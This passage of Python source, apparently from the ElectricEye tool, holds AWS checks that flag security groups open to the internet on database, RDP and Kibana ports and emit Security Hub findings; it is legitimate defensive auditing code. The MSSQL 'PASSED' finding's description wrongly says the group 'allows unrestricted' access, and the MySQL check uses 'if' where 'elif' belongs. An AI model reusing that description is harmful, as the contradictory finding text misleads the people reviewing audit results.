if toPort and fromPort == "1433" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-mssql-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.6] Security groups should not allow unrestricted Microsoft SQL Server (MSSQL) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Microsoft SQL Server (MSSQL) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "Microsoft CVE-2020-0618: Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-0618",
},
{
"Category": "BACKDOOR",
"Value": "Microsoft CVE-2019-0819: Microsoft SQL Server Analysis Services Information Disclosure Vulnerability",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/msft-cve-2019-0819",
},
{
"Category": "BACKDOOR",
"Value": "Microsoft CVE-2018-8273: Microsoft SQL Server Remote Code Execution Vulnerability",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/msft-cve-2018-8273",
},
],
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "1433" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-mssql-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.6] Security groups should not allow unrestricted Microsoft SQL Server (MSSQL) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Microsoft SQL Server (MSSQL) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "Microsoft CVE-2020-0618: Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-0618",
},
{
"Category": "BACKDOOR",
"Value": "Microsoft CVE-2019-0819: Microsoft SQL Server Analysis Services Information Disclosure Vulnerability",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/msft-cve-2019-0819",
},
{
"Category": "BACKDOOR",
"Value": "Microsoft CVE-2018-8273: Microsoft SQL Server Remote Code Execution Vulnerability",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/msft-cve-2018-8273",
},
],
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_oracle_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.7] Security groups should not allow unrestricted Oracle database (TCP 1521) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "1521" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-oracledb-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.7] Security groups should not allow unrestricted Oracle database (TCP 1521) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Oracle database (TCP 1521) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "1521" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-oracledb-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.7] Security groups should not allow unrestricted Oracle database (TCP 1521) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Oracle database (TCP 1521) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_mysql_mariadb_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.8] Security groups should not allow unrestricted MySQL or MariaDB database (TCP 3306) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "3306" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn
+ "/"
+ ipProtocol
+ "/security-group-mysql-mariadb-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.8] Security groups should not allow unrestricted MySQL or MariaDB database (TCP 3306) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted MySQL or MariaDB database (TCP 3306) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
if toPort and fromPort == "3306" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn
+ "/"
+ ipProtocol
+ "/security-group-mysql-mariadb-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.8] Security groups should not allow unrestricted MySQL or MariaDB database (TCP 3306) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted MySQL or MariaDB database (TCP 3306) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_rdp_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.9] Security groups should not allow unrestricted Remote Desktop Protocol (RDP) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "3389" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-rdp-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "CRITICAL"},
"Confidence": 99,
"Title": "[SecurityGroup.9] Security groups should not allow unrestricted Remote Desktop Protocol (RDP) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Remote Desktop Protocol (RDP) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "Microsoft CVE-2020-0660: Windows Remote Desktop Protocol (RDP) Denial of Service Vulnerability",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-0660",
},
{
"Category": "BACKDOOR",
"Value": "Microsoft CVE-2020-0610: Windows Remote Desktop Gateway (RD Gateway) Remote Code Execution Vulnerability",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-0610",
},
],
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "3389" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-rdp-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.9] Security groups should not allow unrestricted Remote Desktop Protocol (RDP) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Remote Desktop Protocol (RDP) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "Microsoft CVE-2020-0660: Windows Remote Desktop Protocol (RDP) Denial of Service Vulnerability",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-0660",
},
{
"Category": "BACKDOOR",
"Value": "Microsoft CVE-2020-0610: Windows Remote Desktop Gateway (RD Gateway) Remote Code Execution Vulnerability",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-0610",
},
],
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_postgresql_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.10] Security groups should not allow unrestricted PostgreSQL datbase (TCP 5432) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "5432" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-postgresql-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.10] Security groups should not allow unrestricted PostgreSQL datbase (TCP 5432) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted PostgreSQL datbase (TCP 5432) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "5432" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-postgresql-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.10] Security groups should not allow unrestricted PostgreSQL datbase (TCP 5432) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted PostgreSQL datbase (TCP 5432) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_kibana_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.11] Security groups should not allow unrestricted access to Kibana (TCP 5601)"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "5601" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-kibana-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.11] Security groups should not allow unrestricted access to Kibana (TCP 5601)",
"Description": "Security group "
+ sgName
+ " allows unrestricted access to Kibana (TCP 5601) on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
